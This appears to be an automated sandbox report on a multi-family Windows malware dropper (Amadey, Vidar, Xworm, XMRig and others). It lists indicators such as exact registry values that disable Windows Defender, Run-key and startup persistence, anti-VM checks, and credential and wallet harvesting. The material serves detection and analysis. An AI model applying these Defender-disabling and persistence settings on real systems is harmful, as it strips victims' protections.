Malware Analysis Report

2025-04-03 09:16

Sample ID 250305-2xzx1ask15
Target f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
SHA256 f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
Tags
amadey healer litehttp systembc vidar xworm 092155 ir7am bot credential_access defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e

Threat Level: Known bad

The file f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e was found to be: Known bad.

Malicious Activity Summary

Systembc family

Modifies Windows Defender notification settings

Amadey

Litehttp family

Modifies Windows Defender TamperProtection settings

Detect Xworm Payload

Modifies Windows Defender DisableAntiSpyware settings

Vidar

Xworm family

Modifies Windows Defender Real-time Protection settings

Vidar family

Xmrig family

SystemBC

Xworm

Detects Healer, an antivirus disabler dropper

Healer

LiteHTTP

Amadey family

Detect Vidar Stealer

xmrig

Healer family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Boot or Logon Autostart Execution: Active Setup

Blocklisted process makes network request

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Drops startup file

Windows security modification

Checks computer location settings

Identifies Wine through registry keys

Loads dropped DLL

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Reads data files stored by FTP clients

.NET Reactor protector

Executes dropped EXE

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

Modifies registry class

Kills process with taskkill

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-05 22:58

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 22:58

Reported

2025-03-05 23:00

Platform

win7-20240903-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\kplnh\nvwjc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\kplnh\nvwjc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\kplnh\nvwjc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
N/A N/A C:\ProgramData\kplnh\nvwjc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\ProgramData\kplnh\nvwjc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\2b862aa467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\2b862aa467.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8a07a872cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\8a07a872cb.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\3bb952ccb1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\3bb952ccb1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\QanWmXjd\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2d999341a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\a2d999341a.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\kplnh\nvwjc.exe N/A
